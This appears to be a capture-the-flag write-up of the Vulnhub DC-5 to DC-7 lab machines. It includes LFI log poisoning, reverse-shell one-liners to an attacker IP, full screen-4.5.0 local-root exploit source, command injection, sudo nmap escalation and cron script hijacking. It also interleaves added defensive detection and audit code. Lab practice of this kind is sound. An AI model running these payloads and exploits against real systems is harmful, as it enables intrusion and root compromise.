
Vulnhub - DC Series

Author: MssnHarvey
Published 2023-02-27 17:20:38
Part of the column: Harvey

Previous posts

The Vulnhub DC machines had been sitting in my to-do pile for ages; this time I am going through the rest of them in one go 😆

DC-1 to DC-4 write-ups: DC-1, DC-2, DC-3, DC-4

DC-5

An nmap scan of live hosts and ports shows ports 80, 111 and 46407 open.

Ports 111 and 46407 (rpcbind) are affected by the rpcbind denial-of-service vulnerability.

The vulnerability lets a remote attacker make the host running rpcbind allocate memory of arbitrary size (up to 4GB per attack). That memory is never released unless the process crashes or an administrator suspends/restarts the rpcbind service.

use auxiliary/scanner/misc/sunrpc_portmapper
set RHOSTS 192.168.150.150

Port 80 looks like this:

The Contact module accepts form submissions. Submitting arbitrary data redirects to thankyou.php, and the year in the page footer changes, which suggests the page includes a file chosen by a request parameter; so I next tried to include files through such a parameter, suspecting an LFI vulnerability.

Testing with wfuzz shows that the file parameter is the one that includes files, and /etc/passwd can be read through it.

wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.150.150/thankyou.php?FUZZ

wfuzz -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt -u http://192.168.150.150/thankyou.php?file=FUZZ

Earlier enumeration showed the server is running Nginx, and Nginx's default configuration lives under /etc/nginx/, so next look at /etc/nginx/nginx.conf, which gives the log locations:

##
# Logging Settings
##

access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;

Once the log file paths are known, we can send a request whose content gets written to the log, then include that log file through the LFI to execute commands and get a reverse shell.

?file=<?php system($_GET['cmd']); ?>
?file=/var/log/nginx/error.log&cmd=bash -i >& /dev/tcp/192.168.150.128/1234 0>&1
# or use nc for the reverse shell
?file=/var/log/nginx/error.log&cmd=nc -e /bin/sh 192.168.150.128 1234
# a one-line webshell can also be written (this did not work in my test, though)
?file=<?php @eval($_POST["harvey"]); ?>
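The request patterns this chain leaves behind are easy to spot in the web server's own logs. As an added example (not from the original post), here is a small Python classifier over constructed nginx access-log lines; the rule names, the regular expression and the sample lines are mine and not taken from the box.

```python
import re
from urllib.parse import unquote

# Constructed sample nginx access-log lines (combined format) for the demo; not logs from the box.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [27/Feb/2023:10:01:02 +0000] "GET /thankyou.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.9 - - [27/Feb/2023:10:01:10 +0000] "GET /thankyou.php?file=footer.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.9 - - [27/Feb/2023:10:01:15 +0000] "GET /thankyou.php?file=/etc/passwd HTTP/1.1" 200 2110 "-" "Mozilla/5.0"
10.0.0.9 - - [27/Feb/2023:10:01:20 +0000] "GET /thankyou.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2110 "-" "Mozilla/5.0"
10.0.0.9 - - [27/Feb/2023:10:01:30 +0000] "GET /thankyou.php?file=%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.9 - - [27/Feb/2023:10:01:35 +0000] "GET /thankyou.php?file=/var/log/nginx/error.log&cmd=id HTTP/1.1" 200 9801 "-" "Mozilla/5.0"
"""

# Combined log format: client ip, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode(value: str) -> str:
    # Decode twice so that double-encoded payloads (%252e%252e%252f) are also caught.
    return unquote(unquote(value))


def query_params(target: str):
    """Split the query string on the raw '&' first, then decode each key and value."""
    if "?" not in target:
        return []
    pairs = []
    for pair in target.split("?", 1)[1].split("&"):
        key, _, val = pair.partition("=")
        pairs.append((decode(key), decode(val)))
    return pairs


def classify(target: str):
    """Return the set of rule names a request target triggers (empty set = benign)."""
    rules = set()
    decoded = decode(target)
    if "<?php" in decoded or "<?=" in decoded:
        rules.add("PHP_TAG")           # PHP code in the request line: log-poisoning attempt
    for _, val in query_params(target):
        if "../" in val or "..\\" in val:
            rules.add("TRAVERSAL")     # directory traversal in a parameter value
        if val.startswith("/"):
            rules.add("ABSOLUTE_PATH") # absolute filesystem path in a parameter value
        if val.startswith("/var/log/") or "/proc/self/environ" in val:
            rules.add("LOG_INCLUDE")   # including a log/environ file: the LFI-to-RCE chain
    return rules


def scan_access_log(text: str):
    """Return one finding dict per suspicious log line, in file order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue
        rules = classify(m.group("target"))
        if rules:
            findings.append({"line": lineno, "ip": m.group("ip"), "status": m.group("status"),
                             "target": m.group("target"), "rules": sorted(rules)})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {f['line']}: {f['ip']} -> {f['target']} [{', '.join(f['rules'])}]")
```

The same classifier can be run over the request strings that end up in error.log, which is the file the write-up includes; on the mitigation side, the include itself should resolve the parameter against an allowlist of footer files rather than passing it to include() at all.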

Next, check for exploitable SUID binaries. Searching for files with the 4000 bit set turns up an unusual SUID binary, screen-4.5.0.

find / -perm -4000 2>/dev/null

A quick search shows that screen-4.5.0 has a known local privilege escalation.

I started a web server and uploaded the exploit sh file. Only /tmp turned out to be writable, and running the sh file there produced an error.

Looking at the sh file, it consists of three parts.

The two C files need to be compiled by hand, and the sh file edited so that the earlier parts are removed and only the last part remains.

# libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
/* runs automatically when the library is loaded through /etc/ld.so.preload */
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

gcc -fPIC -shared -ldl -o libhax.so libhax.c


# rootshell.c
#include <stdio.h>
#include <unistd.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    char *const argv[] = {"/bin/sh", NULL};
    execvp("/bin/sh", argv);
    return 0;
}

gcc -o rootshell rootshell.c


# 41154.sh
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
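Both the SUID search above and the ld.so.preload trick in the exploit leave artefacts that a host audit can catch. The following Python audit is an added example and not part of the original post: it diffs `find / -perm -4000` output against a baseline allowlist and inspects /etc/ld.so.preload entries. The baseline set, the sample find output and the function names are assumptions for the demo.

```python
import re

# Representative allowlist of SUID binaries on a minimal Debian-style install.
# This is an assumption for the demo; a real baseline is recorded from a known-good image.
BASELINE_SUID = {
    "/bin/mount", "/bin/umount", "/bin/su", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/sudo",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

# Directories where ld.so.preload entries would normally live, if the file exists at all.
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")

# Constructed output of `find / -perm -4000 2>/dev/null` for the demo.
SAMPLE_FIND_OUTPUT = """\
/bin/mount
/bin/ping
/bin/screen-4.5.0
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
"""

# A trailing "-4.5.0" style suffix usually means a hand-built, non-packaged binary.
VERSIONED_NAME = re.compile(r"-\d+(\.\d+)+$")
USER_WRITABLE = ("/tmp/", "/dev/shm/", "/home/", "/var/tmp/")


def audit_suid(find_output, baseline=BASELINE_SUID):
    """Return (path, reason) for every SUID binary that is not in the baseline."""
    findings = []
    for path in (p.strip() for p in find_output.splitlines()):
        if not path or path in baseline:
            continue
        reason = "not in baseline"
        if VERSIONED_NAME.search(path):
            reason += "; version-suffixed name suggests a hand-installed build"
        if path.startswith(USER_WRITABLE):
            reason += "; lives in a user-writable location"
        findings.append((path, reason))
    return findings


def audit_ld_preload(content):
    """Return ld.so.preload entries outside the trusted library directories.

    The file is normally absent. Any entry pointing into /tmp or a home directory
    means every dynamically linked program, SUID ones included, loads that library.
    """
    return [line.strip() for line in content.splitlines()
            if line.strip() and not line.strip().startswith(TRUSTED_LIB_DIRS)]


if __name__ == "__main__":
    for path, reason in audit_suid(SAMPLE_FIND_OUTPUT):
        print(f"SUID {path}: {reason}")
    for entry in audit_ld_preload("/tmp/libhax.so\n"):  # constructed file content
        print(f"ld.so.preload: untrusted entry {entry}")
```

Note that the constructor in libhax.c deletes /etc/ld.so.preload as soon as it has run, so the preload check only catches the exploit mid-flight; the SUID audit is the durable one, because the root-owned 4755 binary left in /tmp is exactly what a "not in baseline; user-writable location" finding describes.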

Start the web server again, upload the three files, and run the sh file to escalate privileges (except that in my case running it hit a problem 😶‍🌫️):

/tmp/rootshell: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by /tmp/rootshell)

Running the steps by hand did not work either.

The cause should be the glibc version on the build machine being too new: the binary was linked against a symbol version (GLIBC_2.34) that the target's older libc does not provide.

www-data@dc-5:/tmp$ objdump -p /tmp/rootshell
objdump -p /tmp/rootshell

/tmp/rootshell:     file format elf64-x86-64

Program Header:
    PHDR off    0x0000000000000040 vaddr 0x0000000000000040 paddr 0x0000000000000040 align 2**3
         filesz 0x00000000000002d8 memsz 0x00000000000002d8 flags r--
  INTERP off    0x0000000000000318 vaddr 0x0000000000000318 paddr 0x0000000000000318 align 2**0
         filesz 0x000000000000001c memsz 0x000000000000001c flags r--
    LOAD off    0x0000000000000000 vaddr 0x0000000000000000 paddr 0x0000000000000000 align 2**12
         filesz 0x0000000000000700 memsz 0x0000000000000700 flags r--
    LOAD off    0x0000000000001000 vaddr 0x0000000000001000 paddr 0x0000000000001000 align 2**12
         filesz 0x00000000000001e5 memsz 0x00000000000001e5 flags r-x
    LOAD off    0x0000000000002000 vaddr 0x0000000000002000 paddr 0x0000000000002000 align 2**12
         filesz 0x00000000000000e4 memsz 0x00000000000000e4 flags r--
    LOAD off    0x0000000000002de8 vaddr 0x0000000000003de8 paddr 0x0000000000003de8 align 2**12
         filesz 0x0000000000000268 memsz 0x0000000000000270 flags rw-
 DYNAMIC off    0x0000000000002df8 vaddr 0x0000000000003df8 paddr 0x0000000000003df8 align 2**3
         filesz 0x00000000000001e0 memsz 0x00000000000001e0 flags rw-
    NOTE off    0x0000000000000338 vaddr 0x0000000000000338 paddr 0x0000000000000338 align 2**3
         filesz 0x0000000000000020 memsz 0x0000000000000020 flags r--
    NOTE off    0x0000000000000358 vaddr 0x0000000000000358 paddr 0x0000000000000358 align 2**2
         filesz 0x0000000000000044 memsz 0x0000000000000044 flags r--
0x6474e553 off    0x0000000000000338 vaddr 0x0000000000000338 paddr 0x0000000000000338 align 2**3
         filesz 0x0000000000000020 memsz 0x0000000000000020 flags r--
EH_FRAME off    0x000000000000200c vaddr 0x000000000000200c paddr 0x000000000000200c align 2**2
         filesz 0x000000000000002c memsz 0x000000000000002c flags r--
   STACK off    0x0000000000000000 vaddr 0x0000000000000000 paddr 0x0000000000000000 align 2**4
         filesz 0x0000000000000000 memsz 0x0000000000000000 flags rw-
   RELRO off    0x0000000000002de8 vaddr 0x0000000000003de8 paddr 0x0000000000003de8 align 2**0
         filesz 0x0000000000000218 memsz 0x0000000000000218 flags r--

Dynamic Section:
  NEEDED               libc.so.6
  INIT                 0x0000000000001000
  FINI                 0x00000000000011dc
  INIT_ARRAY           0x0000000000003de8
  INIT_ARRAYSZ         0x0000000000000008
  FINI_ARRAY           0x0000000000003df0
  FINI_ARRAYSZ         0x0000000000000008
  GNU_HASH             0x00000000000003a0
  STRTAB               0x00000000000004d0
  SYMTAB               0x00000000000003c8
  STRSZ                0x00000000000000ad
  SYMENT               0x0000000000000018
  DEBUG                0x0000000000000000
  PLTGOT               0x0000000000004000
  PLTRELSZ             0x0000000000000078
  PLTREL               0x0000000000000007
  JMPREL               0x0000000000000688
  RELA                 0x00000000000005c8
  RELASZ               0x00000000000000c0
  RELAENT              0x0000000000000018
  FLAGS_1              0x0000000008000000
  VERNEED              0x0000000000000598
  VERNEEDNUM           0x0000000000000001
  VERSYM               0x000000000000057e
  RELACOUNT            0x0000000000000003

Version References:
  required from libc.so.6:
    0x09691a75 0x00 03 GLIBC_2.2.5
    0x069691b4 0x00 02 GLIBC_2.34

www-data@dc-5:/tmp$ nm /tmp/rootshell | grep GLIBC_2.34
nm /tmp/rootshell | grep GLIBC_2.34
                 U __libc_start_main@GLIBC_2.34

So I compiled it again on an older machine, uploaded it, and the privilege escalation worked and gave the flag.

DC-6

An nmap scan of live hosts and ports shows ports 22 and 80 open.

Port 80 looks like this:

So we need to edit /etc/hosts and map the site's hostname:

192.168.150.152 wordy

Visiting it again now shows a WordPress site, version 5.1.1, with the following information:

A dirb scan of directories and files finds nothing directly usable.

Running wpscan enumerates five users: admin, mark, graham, sarah and jens.

wpscan --url http://wordy/ --enumerate u

Then, following the clue supplied with the machine, generate a wordlist and brute-force the logins; this gives mark's password: helpdesk01

CLUE OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job. cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ;-)

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
wpscan --url http://wordy/ -U dc-6-users.txt -P passwords.txt -t 50

After logging into the admin panel, there is an Activity monitor plugin that may be vulnerable.

A search turns up an Activity Monitor Command Injection vulnerability; the published exploit html file can be used directly after changing the IP and port to get a reverse shell.

Here I do it by hand: go to Activity monitor -> Tools -> IP or integer and inject a Linux command into the "IP or integer *" field; |, ; and & all work as separators to get the command executed.

Then try a reverse shell. The field has a length limit, which has to be changed in the browser's F12 developer tools. After the reverse shell connects, spawn an interactive shell:

python -c 'import pty;pty.spawn("/bin/bash")'

Then in /home/mark/stuff there is a file things-to-do.txt with the following contents:

Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

That gives us graham's password, GSo7isUM1D4, and ssh login with it succeeds.

Next we find that user graham can run backups.sh as jens without a password.

So go to /home/jens, write /bin/bash into the script, and run it through sudo to switch to the jens user:

echo /bin/bash > backups.sh
sudo -u jens ./backups.sh

Running sudo -l again shows that nmap can be run as root without a password, so we can escalate through nmap's --script option and get the flag:

echo 'os.execute("/bin/sh")' > shell
sudo nmap --script=shell

DC-7

An nmap scan of live hosts and ports shows ports 22 and 80 open.

Port 80 is a Drupal site with the following information:

The footer mentions a user @DC7USER. Searching for that handle turns up a GitHub account and a Twitter account.

The Twitter account has nothing useful, but the GitHub account has a repository, staffdb.

Its configuration file config.php contains the credentials dc7user/MdR3xOgB7#dW. Logging into the website with them fails, but ssh login succeeds.

<?php
    $servername = "localhost";
    $username = "dc7user";
    $password = "MdR3xOgB7#dW";
    $dbname = "Staff";
    $conn = mysqli_connect($servername, $username, $password, $dbname);
?>

After logging in, the mbox file shows that a script, /opt/scripts/backups.sh, is being run by cron:

From root@dc-7 Thu Aug 29 17:00:22 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:00:22 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3EPu-0000CV-5C
        for root@dc-7; Thu, 29 Aug 2019 17:00:22 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EPu-0000CV-5C@dc-7>
Date: Thu, 29 Aug 2019 17:00:22 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:15:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:15:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3EeF-0000Dx-G1
        for root@dc-7; Thu, 29 Aug 2019 17:15:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EeF-0000Dx-G1@dc-7>
Date: Thu, 29 Aug 2019 17:15:11 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:30:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:30:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3Esl-0000Ec-JQ
        for root@dc-7; Thu, 29 Aug 2019 17:30:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Esl-0000Ec-JQ@dc-7>
Date: Thu, 29 Aug 2019 17:30:11 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:45:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:45:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3F7H-0000G3-Nb
        for root@dc-7; Thu, 29 Aug 2019 17:45:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3F7H-0000G3-Nb@dc-7>
Date: Thu, 29 Aug 2019 17:45:11 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 20:45:21 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 20:45:21 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3Hvd-0000ED-CP
        for root@dc-7; Thu, 29 Aug 2019 20:45:21 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Hvd-0000ED-CP@dc-7>
Date: Thu, 29 Aug 2019 20:45:21 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 22:45:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 22:45:17 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3Jng-0000Iw-Rq
        for root@dc-7; Thu, 29 Aug 2019 22:45:16 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Jng-0000Iw-Rq@dc-7>
Date: Thu, 29 Aug 2019 22:45:16 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Thu Aug 29 23:00:12 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 23:00:12 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3K28-0000Ll-11
        for root@dc-7; Thu, 29 Aug 2019 23:00:12 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3K28-0000Ll-11@dc-7>
Date: Thu, 29 Aug 2019 23:00:12 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Fri Aug 30 00:15:18 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 00:15:18 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3LCo-0000Eb-02
        for root@dc-7; Fri, 30 Aug 2019 00:15:18 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3LCo-0000Eb-02@dc-7>
Date: Fri, 30 Aug 2019 00:15:18 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Fri Aug 30 03:15:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 03:15:17 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from <root@dc-7>)
        id 1i3O0y-0000Ed-To
        for root@dc-7; Fri, 30 Aug 2019 03:15:17 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3O0y-0000Ed-To@dc-7>
Date: Fri, 30 Aug 2019 03:15:17 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]

So look at /opt/scripts/backups.sh. The script runs as root, and the file is group-owned by www-data's group. Its contents include a drush command, and drush can also be used to change account passwords.

drush is the Drupal shell, a command-line tool for administering Drupal that communicates with the Drupal CMS.

dc7user@dc-7:~$ cat /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
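The DC-6 step (graham may run jens's backups.sh through sudo) and this DC-7 step (root's cron runs a script that www-data's group can write) are the same misconfiguration: a script executed with higher privileges that a lower-privileged account can edit. As an added example not taken from the post, the Python audit below checks that condition over constructed file metadata, group membership and a list of privileged invocations; the two script paths come from the write-up, while the modes, group names and function names are assumptions for the demo.

```python
import stat
from dataclasses import dataclass


@dataclass(frozen=True)
class FileInfo:
    owner: str
    group: str
    mode: int          # permission bits, as in os.stat(path).st_mode & 0o7777


@dataclass(frozen=True)
class PrivilegedRun:
    script: str
    runs_as: str       # account the script executes as
    source: str        # where the privilege comes from (for the report only)


# Constructed metadata for the demo. A real audit collects this with os.stat,
# the group database, and by parsing sudoers and the crontabs.
FILES = {
    "/home/jens/backups.sh":    FileInfo("jens", "devs", 0o775),
    "/opt/scripts/backups.sh":  FileInfo("root", "www-data", 0o775),
    "/usr/local/bin/rotate.sh": FileInfo("root", "root", 0o755),
}
GROUPS = {   # user -> set of groups the user belongs to
    "root": {"root"}, "jens": {"jens", "devs"}, "graham": {"graham", "devs"},
    "www-data": {"www-data"}, "dc7user": {"dc7user"},
}
RUNS = [
    PrivilegedRun("/home/jens/backups.sh", "jens", "sudoers: graham may run it as jens NOPASSWD"),
    PrivilegedRun("/opt/scripts/backups.sh", "root", "root crontab"),
    PrivilegedRun("/usr/local/bin/rotate.sh", "root", "root crontab"),
]


def can_write(info, user, groups):
    """True if `user` can modify the file according to the owner/group/other write bits."""
    if info.mode & stat.S_IWOTH:
        return True
    if info.mode & stat.S_IWGRP and info.group in groups.get(user, set()):
        return True
    return bool(info.mode & stat.S_IWUSR) and info.owner == user


def audit_privileged_scripts(runs, files, groups):
    """Return (writer, script, runs_as, source) for every script that some account other
    than root or the account it runs as is able to edit."""
    findings = []
    for run in runs:
        info = files.get(run.script)
        if info is None:
            continue  # path missing: out of scope for this check
        for user in groups:
            if user in ("root", run.runs_as):
                continue
            if can_write(info, user, groups):
                findings.append((user, run.script, run.runs_as, run.source))
    return sorted(findings)


if __name__ == "__main__":
    for writer, script, runs_as, source in audit_privileged_scripts(RUNS, FILES, GROUPS):
        print(f"{writer} can edit {script}, which runs as {runs_as} ({source})")
```

The fix in both cases is the same: scripts that run as another account must be owned by that account (or root) with mode 0755 or tighter, and a sudo rule should point at a root-owned binary rather than at a file in the invoking user's reach.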

Then change to /var/www/html, where the Drupal install is, and use that command to change the administrator's password:

drush user-password admin --password=admin

Going back to the login page, we can now log in successfully.

Next, Manage -> Extend -> Install new module allows uploading a module. Download Drupal's PHP module package and upload the tar file, click "Enable newly added modules", tick PHP Filter and click Install to finish installing the module:

https://www.drupal.org/project/php
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

Then go to Content -> Add content -> Basic page, choose "PHP code" as the Text format, paste in reverse-shell code, and click Preview. Once the reverse shell connects, spawn an interactive shell:

python -c 'import pty;pty.spawn("/bin/bash")'

Afterwards I saw that weevely can also be used here: generate a webshell with weevely generate <password> <output path and file name>, for example weevely generate harvey /root/harvey.php, and then connect to it with weevely http://192.168.150.153/node/4 harvey.

Now we can go to /opt/scripts, add a reverse-shell command to backups.sh, and have it executed (cron runs it as root) to escalate privileges:

# escalation failed?
echo "bash -i >& /dev/tcp/192.168.150.128/4444 0>&1" > backups.sh

# a write-up I read later says to write it like this, but when I tried it the escalation still failed 😅
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.150.128 4444 >/tmp/f" >> backups.sh

# there is also the option of generating a reverse shell with msfvenom, but that failed as well 😣
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.150.128 lport=4444 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 93 bytes
mkfifo /tmp/fmsr; nc 192.168.150.128 4444 0</tmp/fmsr | /bin/sh >/tmp/fmsr 2>&1; rm /tmp/fmsr
